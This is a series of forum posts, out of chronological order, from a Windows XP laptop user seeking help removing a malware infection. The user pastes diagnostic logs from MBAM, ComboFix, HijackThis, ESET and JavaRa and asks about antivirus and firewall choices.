Thank you for all of those tips. They will come in handy if I ever need to reinstall Windows on this PC or buy a new machine. This laptop is old now (dated late 2003) but I do very little PC gaming, so have never felt truly pushed to replace it. It feels like it was limited from the very beginning though as the graphics chip can't handle very much. I had to upgrade the RAM to improve performance but even now, any webpages with Flash animations cause the PC to become sluggish. Even simple things like mouse wheel scrolling becomes laboured if Flash ads are on the page. Seeing as one of the main viruses that infected my PC this time was identical or related to the one that infected my PC before, when I needed your help, is it worth running any of the other commands that you advised me to do in my other thread? Commands such as flushing the DNS, resetting the firewall, IP reset and so on? Would it cause a problem if I did it just to be on the safe side? If I was worried about router security the last time round, could I not be under the same threat again (even though I never kept the default password)? I'll certainly be buying the registered version of MBAM as it has done a fantastic job in finding lots of nasties (and just as importantly, killing them). I'm thinking I may need to buy better anti-virus software as well. I am currently using AVG 8.5 Free but haven't really tried anything else other than sluggish Norton Internet Security. Is there one you would recommend? Just as importantly, is there a firewall you would recommend buying? Are "Internet Suites" that have a firewall and anti-virus by the same developer better than separate ones, due to not needing multiple software engines running, or does it not really matter? ZoneAlarm Pro is supposed to be a good firewall but I always read that their anti-virus software is lacking. Thanks again.

The PC seems to be running fine so far. I haven't seen (or heard) any signs of anything nasty. I haven't yet tried performing a System Restore (after making a new Restore Point where things seem okay) to see if a Restore op will actually work once again. The PC did appear to hang two days ago briefly. This happened during initial bootup, where you get to the Logon screen. The Windows screen saver came on as I had gone off to do something else while I was waiting for it to boot up (I often see plenty of disk access at the Logon screen so I prefer to let it do what it wants to before I log in and cause it to load up yet more). I moved the mouse and the screen went completely black. Nothing happened for just under a minute. No disk access or anything. Normally the screen saver will disappear straight away as soon as I move the mouse. However, I deliberately left it today so the screen saver would come on at the Logon screen and this time it responded fine. Here is the log for NOD32: ESETSmartInstaller@High as CAB hook log: OnlineScanner.ocx - registred OK # version=6 # iexplore.exe=7.00.6000.16791 (vista_gdr.081217-1620) # OnlineScanner.ocx=1.0.0.6050 # api_version=3.0.2 # EOSSerial=cf5e79d1be913942bfcccf9d9a7fda7f # end=finished # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=true # antistealth_checked=true # utc_time=2009-10-01 08:31:05 # local_time=2009-10-01 09:31:05 (+0000, GMT Daylight Time) # country="United Kingdom" # lang=1033 # osver=5.1.2600 NT Service Pack 3 # compatibility_mode=1026 21 66 100 35976343437500 # scanned=382104 # found=0 # cleaned=0 # scan_time=11458 I also ran Dr. Web (although I didn't update it as I don't really know what "launch.exe" is) and that didn't find anything either. I ran that because I remember that picking up something that other software had missed during the last infection I got. I downloaded it again as I remember you asking me to use that last time, and wanted to see if anything new would appear. Regards.

Spybot was successfully uninstalled, although I had to delete an associated folder in Documents & Settings. I forgot to check Program Files until after I did all these scans and deletions. There are lots of files still in there. This may have been caused by an old Restore Point as I was unable to uninstall Spybot until I installed a new version one day before I got the recent virus infection. I didn't have TeaTimer activated, just the added Internet Explorer protection. This aside, I hadn't noticed any trouble running the tasks you asked me to do and IE7 looks like it was when I first installed it. Java was also successfully uninstalled. I needed to manually delete Sun folders from several places after running JavaRa. In Documents & Settings, I also found the Sun folder in the "Administrator" and "Default User" folders, as well as "All Users" and "user". I removed those as well, seeing as you said to remove all versions of Java. Here is JavaRa.log: JavaRa 1.15 Removal Log. Report follows after line. ------------------------------------ The JavaRa removal process was started on Thu Oct 01 01:19:17 2009 Found and removed: SOFTWARE\Classes\JavaPlugin.150_03 Found and removed: SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\8A0F841731866D117AB7000B0D410200 Found and removed: SOFTWARE\Classes\JavaPlugin.142 ------------------------------------ Finished reporting. Next up is the latest MBAM log. I have run MBAM several times since the recent infection. Other than the first log I posted in this thread, MBAM has not detected anything: Malwarebytes' Anti-Malware 1.41 Database version: 2879 Windows 5.1.2600 Service Pack 3 01/10/2009 02:09:56 mbam-log-2009-10-01 (02-09-56).txt Scan type: Quick Scan Objects scanned: 98398 Time elapsed: 7 minute(s), 47 second(s) Memory Processes Infected: 0 Memory Modules Infected: 0 Registry Keys Infected: 0 Registry Values Infected: 0 Registry Data Items Infected: 0 Folders Infected: 0 Files Infected: 0 Memory Processes Infected: (No malicious items detected) Memory Modules Infected: (No malicious items detected) Registry Keys Infected: (No malicious items detected) Registry Values Infected: (No malicious items detected) Registry Data Items Infected: (No malicious items detected) Folders Infected: (No malicious items detected) Files Infected: (No malicious items detected) Next is System.ini: ; for 16-bit app support [drivers] wave=mmdrv.dll timer=timer.drv [mci] [driver32] [386enh] woafont=app850.FON EGA80WOA.FON=EGA80850.FON EGA40WOA.FON=EGA40850.FON CGA80WOA.FON=CGA80850.FON CGA40WOA.FON=CGA40850.FON Next is win.ini: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] aif=MPEGVideo aifc=MPEGVideo aiff=MPEGVideo asf=MPEGVideo2 asx=MPEGVideo2 au=MPEGVideo m1v=MPEGVideo mp2=MPEGVideo mp2v=MPEGVideo mpa=MPEGVideo mpe=MPEGVideo mpeg=MPEGVideo mpg=MPEGVideo mpv2=MPEGVideo snd=MPEGVideo wax=MPEGVideo2 wm=MPEGVideo2 wma=MPEGVideo2 wmv=MPEGVideo2 wmx=MPEGVideo2 wvx=MPEGVideo2 wpl=MPEGVideo m2v=MPEGVideo mod=MPEGVideo mp3=MPEGVideo m3u=MPEGVideo [RAD Video Tools] Path=C:\Documents and Settings\user\My Documents\RRogueTrooperAddons\Rogue Trooper Addons\trtraa\Sounds\Streams BinkComp=/d650000 /m3.0 /l4 /p8 BinkMix= SmackComp=/l104 SmackMix=/l104 BinkPlay= SmackPlay= BinkConv=/v X=212 Y=123 W=563 H=538 [bOP] forcemono=off screensave=on click=on [MSUCE] Advanced=0 CodePage=Unicode Font=Arial Rogue Trooper is a game and I had copied the movies to My Docs to view separately from the game. I'm not sure why the Pathname for it is still there though as neither the game nor the movies are currently on my hard disk. After deleting Java, resetting IE7 and rebooting the PC, I see that Windows Security Centre is active again. The status panels for the Firewall, Windows Update and Virus Protection are visible once more, as is the red warning shield in the System Tray (because I have disabled Windows Updates). I also got a notification window, upon bootup, saying that Adobe Flash Player had an update. I guess that was just coincidence and probably because I had previously told it to remind me later after 30 days. Thanks again.

Hello again. Sorry I couldn't respond sooner. I was experiencing bad internet performance for the entire day yesterday. Speeds were either erratic, jumping constantly from 200KB to 400KB a second, or I was seeing virtually dial-up modem performance as I couldn't get faster than 10KB a second. It varied wherever I was downloading from and I couldn't get my usual 8Mbit speed. MBAM took twenty minutes to get the latest update. According to my ISP, there were some serious problems on the network but the area they listed it in was nowhere near where I live. It seems a lot better now so I am assuming that my speed issues were not related to any infection, although I am not 100% certain. I successfully ran ComboFix. It took a long time to finish up, longer than when I had used it for my first infection. I didn't switch off my router while running it and I could connect to this site fine after running it, without needing to reboot. Here are the following logs. ComboFix.txt: ComboFix 09-09-29.02 - user 30/09/2009 7:26.3.1 - NTFSx86 Running from: c:\documents and settings\user\Desktop\Combo-Fix.exe * Created a new restore point . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . c:\windows\run.log . ((((((((((((((((((((((((( Files Created from 2009-08-28 to 2009-09-30 ))))))))))))))))))))))))))))))) . 2009-09-29 23:59 . 2009-09-29 23:59 -------- d-----w- c:\program files\FLV Player 2009-09-29 23:20 . 2009-09-30 00:03 -------- d-----w- c:\documents and settings\user\Application Data\BID 2009-09-20 19:25 . 2009-09-20 21:37 -------- d-----w- c:\documents and settings\user\DoctorWeb 2009-09-13 02:38 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-13 02:38 . 2009-09-13 02:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware 2009-09-13 02:38 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\user\Application Data\Malwarebytes 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes 2009-08-31 21:37 . 2009-08-31 21:37 -------- d-----w- c:\program files\Trend Micro . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2009-09-30 06:02 . 2007-06-28 00:17 -------- d-----w- c:\program files\GetRight 2009-09-29 23:20 . 2007-07-03 20:38 -------- d-----w- c:\program files\Bulk Image Downloader 2009-09-29 06:31 . 2008-04-20 17:13 -------- d-----w- c:\program files\Spybot - Search & Destroy 2009-09-29 06:28 . 2007-07-15 06:39 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy 2009-09-29 01:22 . 2007-12-29 12:48 -------- d-----w- c:\documents and settings\user\Application Data\uTorrent 2009-09-04 00:19 . 2005-05-27 22:46 -------- d-----w- c:\program files\ahead 2009-09-03 23:36 . 2003-12-03 15:08 -------- d--h--w- c:\program files\InstallShield Installation Information 2009-09-03 23:36 . 2007-08-13 07:14 -------- d-----w- c:\program files\Real 2009-09-03 23:32 . 2008-03-11 21:50 -------- d-----w- c:\program files\Meridian Advance 2009-09-03 01:45 . 2009-04-16 05:46 -------- d-----w- c:\program files\PicaLoader 2009-08-24 02:17 . 2009-02-27 16:43 123 ----a-w- C:\drmHeader.bin 2009-08-21 10:05 . 2009-07-17 17:33 -------- d-----w- c:\documents and settings\user\Application Data\Free Audio Editor 2009-08-21 05:10 . 2008-06-19 10:53 11952 ----a-w- c:\windows\system32\avgrsstx.dll 2009-08-21 05:10 . 2008-06-19 10:53 335240 ----a-w- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 05:10 . 2008-06-19 10:53 27784 ----a-w- c:\windows\system32\drivers\avgmfx86.sys . ------- Sigcheck ------- [7] 2008-04-14 . 6D4FEB43EE538FC5428CC7F0565AA656 . 56320 . . [5.1.2600.5512] . . c:\windows\ERDNT\cache\eventlog.dll [7] 2008-04-14 . 6D4FEB43EE538FC5428CC7F0565AA656 . 56320 . . [5.1.2600.5512] . . c:\windows\ServicePackFiles\i386\eventlog.dll [7] 2004-08-04 . 82B24CB70E5944E6E34662205A2A5B78 . 55808 . . [5.1.2600.2180] . . c:\windows\$NtServicePackUninstall$\eventlog.dll c:\windows\system32\eventlog.dll ... is missing !! . ((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))))) . . *Note* empty entries & legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "NoAds"="c:\program files\NoAds\NoAds.exe" [2007-10-27 151552] "Mmm"="c:\program files\HACE\Mmm\Mmm.exe" [2005-07-05 828416] "WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2006-10-18 204288] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "IgfxTray"="c:\windows\System32\igfxtray.exe" [2003-04-07 155648] "HotKeysCmds"="c:\windows\System32\hkcmd.exe" [2003-04-07 114688] "00THotkey"="c:\windows\System32\00THotkey.exe" [2003-05-23 253952] "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2003-07-17 159744] "TouchED"="c:\program files\TOSHIBA\TouchED\TouchED.Exe" [2003-03-11 122880] "PadTouch"="c:\program files\TOSHIBA\PadTouch\PadExe.exe" [2003-11-24 1019904] "NeroCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648] "AVG8_TRAY"="c:\progra~1\AVG\AVG8\avgtray.exe" [2009-08-21 2007832] "Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080] "000StTHK"="000StTHK.exe" - c:\windows\system32\000StTHK.exe [2001-06-23 24576] "LTSMMSG"="LTSMMSG.exe" - c:\windows\ltsmmsg.exe [2003-04-18 32768] "TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-15 73728] "TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-27 266240] "TFncKy"="TFncKy.exe" [bU] "Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" - c:\windows\KHALMNPR.Exe [2008-12-18 76304] c:\documents and settings\All Users\Start Menu\Programs\Startup\ Adobe Reader Speed Launch.lnk - c:\program files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2008-4-23 29696] Logitech SetPoint.lnk - c:\program files\Logitech\SetPoint\SetPoint.exe [2009-6-2 809488] Microsoft Works Calendar Reminders.lnk - c:\program files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe [1999-9-4 53317] Start GetRight.lnk - c:\program files\GetRight\GetRight.exe [2007-6-28 4628752] [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\LBTWlgn] 2009-02-18 23:30 72208 ----a-w- c:\program files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter] 2009-08-21 05:10 11952 ----a-w- c:\windows\system32\avgrsstx.dll [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WdfLoadGroup] @="" [HKEY_LOCAL_MACHINE\software\microsoft\security center] "AntiVirusOverride"=dword:00000001 [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"= R3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\DRIVERS\SMCWGU.sys [x] S1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\System32\Drivers\avgldx86.sys [2009-08-21 335240] S1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [2008-05-24 53760] S2 avg8wd;AVG8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [2009-08-21 297752] . . ------- Supplementary Scan ------- . uStart Page = hxxp://home.live.com/ uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchURL,(Default) = hxxp://www.google.com/search?q=%s IE: Download with GetRight - c:\program files\GetRight\GRdownload.htm IE: Open with GetRight Browser - c:\program files\GetRight\GRbrowse.htm DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab . ************************************************************************** catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net Rootkit scan 2009-09-30 07:33 Windows 5.1.2600 Service Pack 3 NTFS scanning hidden processes ... scanning hidden autostart entries ... scanning hidden files ... scan completed successfully hidden files: 0 ************************************************************************** . --------------------- LOCKED REGISTRY KEYS --------------------- [HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\SystemCertificates\AddressBook*] @Allowed: (Read) (RestrictedCode) @Allowed: (Read) (RestrictedCode) . --------------------- DLLs Loaded Under Running Processes --------------------- - - - - - - - > 'winlogon.exe'(424) c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll c:\program files\common files\logishrd\bluetooth\LBTServ.dll . Completion time: 2009-09-30 7:38 ComboFix-quarantined-files.txt 2009-09-30 06:37 Pre-Run: 2,550,685,696 bytes free Post-Run: 2,524,905,472 bytes free 125 ComboFix-quarantined-files.txt: 2009-09-30 06:32:07 . 2009-09-30 06:32:07 6,656 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg 2009-09-30 06:24:47 . 2009-09-30 06:24:47 51 ----a-w- C:\Qoobox\Quarantine\catchme.log 2009-09-28 23:12:30 . 2009-09-28 23:12:30 10 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\run.log.vir HijackThis log: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 08:06:52, on 30/09/2009 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16791) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\NoAds\NoAds.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe C:\WINDOWS\explorer.exe C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing) O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing) O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing) O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing) O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe O4 - HKLM\..\Run: [TFNF5] TFNF5.exe O4 - HKLM\..\Run: [TPSMain] TPSMain.exe O4 - HKLM\..\Run: [TFncKy] TFncKy.exe O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - HKUS\S-1-5-21-2888162382-313132713-241459312-1006\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" (User '?') O4 - HKUS\S-1-5-21-2888162382-313132713-241459312-1006\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" (User '?') O4 - HKUS\S-1-5-21-2888162382-313132713-241459312-1006\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe (User '?') O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265 O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos/OnlineScanner.cab O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing) O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe -- End of file - 8537 bytes I saw that error again when I tried to do a scan and log in HijackThis. It brings up an error window shortly after running a scan and then carries on after I have clicked Yes or No to send off a bug report. I haven't actually sent off a report because I didn't want to risk it interfering with the IE window I already had running (I ran HJT as I was making this post). I don't know if this error occurs because I have IE running but the error only shows up the first time and doesn't affect the scan. This time I have actually written it down and is shown as follows (I have left out certain text outside of the error code): An unexpected error has occurred at procedure: modRegistry_IniGetString (sFile=system.ini, sSection=boot, sValue=Shell) Error #5 - Invalid procedure call or argument Thank you once again for your assistance. Regards.

System information (Toshiba laptop PC, Windows XP Home, XP firewall, Internet Explorer 7, AVG 8.5 Free Edition, ZyXEL wired router) Unfortunately, my PC has once again been under attack from viruses, which is frustrating after receiving (excellent) support from AdvancedSetup to clean it. I got infected this time after clicking on a link at an image hosting site (no it was not pornography, unless you consider movie cars as such). Strangely and as chance would have it, I experienced very similar symptoms with the initial infection to what I suffered the first time I needed help at this site. No image appeared on the site and instead there was a black screen, followed by a message from Adobe Reader asking if I wanted to enable JavaScript (as I had turned it off for security reasons). I hadn't clicked on a PDF link so this was unexpected. I closed the window without allowing JavaScript to be enabled and straight away afterwards, I received a message that my XP Firewall was once again disabled. For the record, I hadn't got round to installing Online Armor Free, that AdvancedSetup recommended, as I was planning to buy new Firewall software in the next few days. I quickly re-enabled it, closed Internet Explorer and then ran CCleaner to delete all temporary files. I then examined the Temp folder in the Local Settings folder and found that two files had survived. Once again I saw a familiar file from last time, called Serr.tmp, along with another .tmp file with an unrecognisable name. Soon afterwards, more .tmp files started to appear in the Temp folder and the number continued to grow. They had various names, some longer than others. Through a state of panic and dread, I started manually trying to delete them but several were protected (I could kill a few of them though). I then realised I needed to kill my internet connection (normally this is the first thing I do but I stupidly forgot) as more and more files were being downloaded. Many of the files were listed as letters of the alphabet and were simply labelled: a.tmp, b.tmp, c.tmp and so on. During this, in the System Tray, an icon that looked like the Windows Security Centre red warning shield appeared. It was almost identical looking but looked a ever so slightly different in shape and colour. It kept bringing up a balloon saying that my PC had been infected by a virus. Closing it would only keep it away for a few seconds. At the same time, a window would pop-up trying to access a website. As I had switched off my router I don't know what this would have shown. I ran MBAM soon after and it successfully managed to kill multiple viruses. Using Quick Scan, it found about 6-8 viruses near the beginning of the scan and then near the end, that number went right up. Two of them could only be removed on a reboot. Upon reboot the system appeared clean and that bogus Security Centre icon had gone. I ran MBAM again, which didn't find anything. However, Windows Security Centre had been switched off, as had the firewall. I could switch the firewall back on after I received a warning that certain services had been stopped but Security Center doesn't show any status now. Nothing appears in System Tray and looking at its main window, there are no longer status panels for the firewall, Windows Updates or the Anti-Virus software. Also, on the left hand side of the window, in the Resources panel, "Change the way Security Centre alerts me" has been greyed out and disabled. CheckDisk is working fine. System Restore will let me make a new Restore Point and even allow me to load an earlier one but upon a reboot, it always says that the restore has failed. I also get an error on bootup that PadExe.exe has encountered a problem and has stopped working. Thankfully, I use a mouse so I can still use the PC but this is annoying nonetheless. Like my previous infection, I encountered this error before. Lastly, upon reboot, I see the Temp folder always has the same two files/folders. I can delete them manually without trouble but they always return. There is one single file called FEE5E75C.TMP and one folder called WPDNSE. The folder is always empty. They return upon every reboot but the date and time are different each time they are newly created. They do not have the current date and time that the PC has started up. I don't know if these are something malicious or not. I don't know if my system is clean and that the problems with Security Centre, System Restore and PadExe are down to damage. To be certain though, I ask again for your help. I've also realised not to visit image hosting sites in the future, no matter what the content, as it appears too risky. Seeing as I am familiar with the initial details, I have copied and pasted the MBAM log that showed the viruses, followed by a HijackThis log. MBAM log: Malwarebytes' Anti-Malware 1.41 Database version: 2852 Windows 5.1.2600 Service Pack 3 29/09/2009 00:27:46 mbam-log-2009-09-29 (00-27-46).txt Scan type: Quick Scan Objects scanned: 98412 Time elapsed: 9 minute(s), 31 second(s) Memory Processes Infected: 3 Memory Modules Infected: 0 Registry Keys Infected: 5 Registry Values Infected: 2 Registry Data Items Infected: 0 Folders Infected: 0 Files 